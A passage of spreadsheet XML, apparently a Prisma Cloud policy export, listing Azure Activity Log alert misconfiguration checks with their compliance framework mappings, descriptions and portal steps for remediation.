234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CIS v1.3.1 (Azure), NIST 800-53 Rev 5, MTSBv2_Azure, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.4.0 (Azure), CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, CIS v1.1 (Azure), Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS v1.3.0 (Azure), ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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NIST CSF, Fedramp (Moderate), NIST CSF, ITSG-33, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of CIS v1.2.0 (Azure), ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, Brazilian Data Protection Law (LGPD), testazure, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, TX-RAMP Level 1, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2161" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2161" s="2" t="inlineStr"/>
      <c r="D2161" t="inlineStr"/>
      <c r="E2161" t="inlineStr"/>
      <c r="F2161" t="inlineStr"/>
      <c r="G2161" t="b">
        <v>0</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2161" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2161" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create or update network security group rule does not exist</t>
        </is>
      </c>
      <c r="L2161" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2161" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2161" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2161" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2161" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2161" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2161" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2161" t="inlineStr"/>
      <c r="T2161" t="b">
        <v>0</v>
      </c>
      <c r="U2161" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2161" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2161" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create or update network security group rule does not exist. Creating an activity log alert for Create or update network security group rule gives insight into network rule access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2161" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create or Update Security Rule (Microsoft.Network/networkSecurityGroups/securityRules)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2161" t="inlineStr"/>
      <c r="Z2161"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Microsoft.Network/networkSecurityGroups/securityRules/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2161" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2161" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2161" t="inlineStr">
        <is>
          <t>PC-AZR-MON-486</t>
        </is>
      </c>
      <c r="AD2161" t="b">
        <v>1</v>
      </c>
      <c r="AE2161" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2161" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>6546a2d7-b1ef-4f6c-82c6-fe56cadb0877</t>
        </is>
      </c>
      <c r="AI2161" t="inlineStr">
        <is>
          <t>c52481aa-187b-40f7-8a60-6b34b0678f18</t>
        </is>
      </c>
      <c r="AJ2161" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2161" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.1 (Azure), CIS v1.3.1 (Azure), MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 1, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, CIS v1.3.0 (Azure), CIS v1.2.0 (Azure), NIST 800-53 Rev 5, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, SOC 2, NIST 800-53 Rev 5, ITSG-33,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Copy of CIS v1.2.0 (Azure), NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, testazure, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, CIS v2.0.0 (Azure) Level 1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1,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NIST CSF, Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.5.0 (Azure) - Level 1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, MTSBv2_Azure, NIST CSF, CSA CCM v.4.0.1, CIS v1.4.0 (Azure)</t>
        </is>
      </c>
      <c r="B2162" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2162" s="2" t="inlineStr"/>
      <c r="D2162" t="inlineStr"/>
      <c r="E2162" t="inlineStr"/>
      <c r="F2162" t="inlineStr"/>
      <c r="G2162" t="b">
        <v>0</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2162" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2162" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Delete network security group does not exist</t>
        </is>
      </c>
      <c r="L2162" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2162" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2162" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2162" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2162" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2162" t="inlineStr">
        <is>
          <t>Logging and Monitoring</t>
        </is>
      </c>
      <c r="R2162" t="inlineStr">
        <is>
          <t>5.2.4</t>
        </is>
      </c>
      <c r="S2162" t="inlineStr"/>
      <c r="T2162" t="b">
        <v>0</v>
      </c>
      <c r="U2162" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2162" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2162" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete network security group does not exist. Creating an activity log alert for the Delete network security group gives insight into network access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2162" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete Network Security Group (Microsoft.Network/networkSecurityGroups)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2162" t="inlineStr"/>
      <c r="Z2162"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Microsoft.Network/networkSecurityGroups/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2162" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2162" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2162" t="inlineStr">
        <is>
          <t>PC-AZR-MON-488</t>
        </is>
      </c>
      <c r="AD2162" t="b">
        <v>1</v>
      </c>
      <c r="AE2162" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2162" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>d2f5ce8c-a0f5-435a-a752-2f9d3af3c561</t>
        </is>
      </c>
      <c r="AI2162" t="inlineStr">
        <is>
          <t>519d561b-6bb1-48c1-97a5-9abdf9967066</t>
        </is>
      </c>
      <c r="AJ2162" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2162" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, CIS v1.2.0 (Azure), MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, NIST 800-53 Rev 5, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, CIS v1.3.1 (Azure), APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Copy of CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, SOC 2, NIST 800-53 Rev 5, ITSG-33, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, testazure, PCI DSS v4.0, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.5.0 (Azure) - Level 1,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ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, CIS v2.1.0 (Azure) Level 1, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), MTSBv2_Azure, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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CIS v1.3.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, CIS v1.4.0 (Azure), Fedramp (Moderate), NIST CSF,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PCI DSS v4.0, CIS v1.1 (Azure), Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2163" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2163" s="2" t="inlineStr"/>
      <c r="D2163" t="inlineStr"/>
      <c r="E2163" t="inlineStr"/>
      <c r="F2163" t="inlineStr"/>
      <c r="G2163" t="b">
        <v>0</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2163" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2163" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Delete SQL server firewall rule does not exist</t>
        </is>
      </c>
      <c r="L2163" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2163" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2163" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2163" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2163" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2163" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2163" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2163" t="inlineStr"/>
      <c r="T2163" t="b">
        <v>0</v>
      </c>
      <c r="U2163" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2163" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2163" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete SQL server firewall rule does not exist. Creating an activity log alert for Delete SQL server firewall rule gives insight into SQL server firewall rule access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2163" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete server firewall rule (Microsoft.Sql/servers/firewallRules)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2163" t="inlineStr"/>
      <c r="Z2163"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Microsoft.Sql/servers/firewallRules/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2163" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2163" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2163" t="inlineStr">
        <is>
          <t>PC-AZR-MON-494</t>
        </is>
      </c>
      <c r="AD2163" t="b">
        <v>1</v>
      </c>
      <c r="AE2163" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2163" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>cc676194-df66-44ef-9189-b31f2c665ef8</t>
        </is>
      </c>
      <c r="AI2163" t="inlineStr">
        <is>
          <t>a20f19ac-690d-4dc6-b4b0-08481df67be5</t>
        </is>
      </c>
      <c r="AJ2163" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2163" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, CIS v1.3.1 (Azure), Fedramp (Moderate), CSA CCM v.4.0.6, NIST 800-53 Rev 5, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, testazure, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, CIS v1.4.0 (Azure), APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, MTSBv2_Azure, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5, ITSG-33, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of CIS v1.2.0 (Azure), NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.1 (Azure), New Zealand Information Security Manual (NZISM v3.4), PCI DSS v4.0, NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India,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NIST CSF, Fedramp (Moderate), NIST CSF,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CSA CCM v4.0.12, CIS v1.2.0 (Azure), Matt's ATT&amp;ACK, CIS v1.3.0 (Azure), Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, PCI DSS v4.0, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2164" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2164" s="2" t="inlineStr"/>
      <c r="D2164" t="inlineStr"/>
      <c r="E2164" t="inlineStr"/>
      <c r="F2164" t="inlineStr"/>
      <c r="G2164" t="b">
        <v>0</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2164" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2164" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Delete network security group rule does not exist</t>
        </is>
      </c>
      <c r="L2164" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2164" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2164" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2164" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2164" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2164" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2164" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2164" t="inlineStr"/>
      <c r="T2164" t="b">
        <v>0</v>
      </c>
      <c r="U2164" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2164" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2164" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete network security group rule does not exist. Creating an activity log alert for Delete network security group rule gives insight into network rule access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2164" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete Security Rule (Microsoft.Network/networkSecurityGroups/securityRules)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2164" t="inlineStr"/>
      <c r="Z2164"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Microsoft.Network/networkSecurityGroups/securityRules/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2164" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2164" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2164" t="inlineStr">
        <is>
          <t>PC-AZR-MON-492</t>
        </is>
      </c>
      <c r="AD2164" t="b">
        <v>1</v>
      </c>
      <c r="AE2164" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2164" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>34462acf-2f40-4fdd-8b67-5194ac3db609</t>
        </is>
      </c>
      <c r="AI2164" t="inlineStr">
        <is>
          <t>288773ee-db23-4eed-baaf-810c7f3bb9fd</t>
        </is>
      </c>
      <c r="AJ2164" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2164" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" t="inlineStr">
        <is>
          <t>CIS v2.1.0 (Azure) Level 1, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, CIS v2.0.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2165" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2165" s="2" t="inlineStr"/>
      <c r="D2165" t="inlineStr"/>
      <c r="E2165" t="inlineStr"/>
      <c r="F2165" t="inlineStr"/>
      <c r="G2165" t="b">
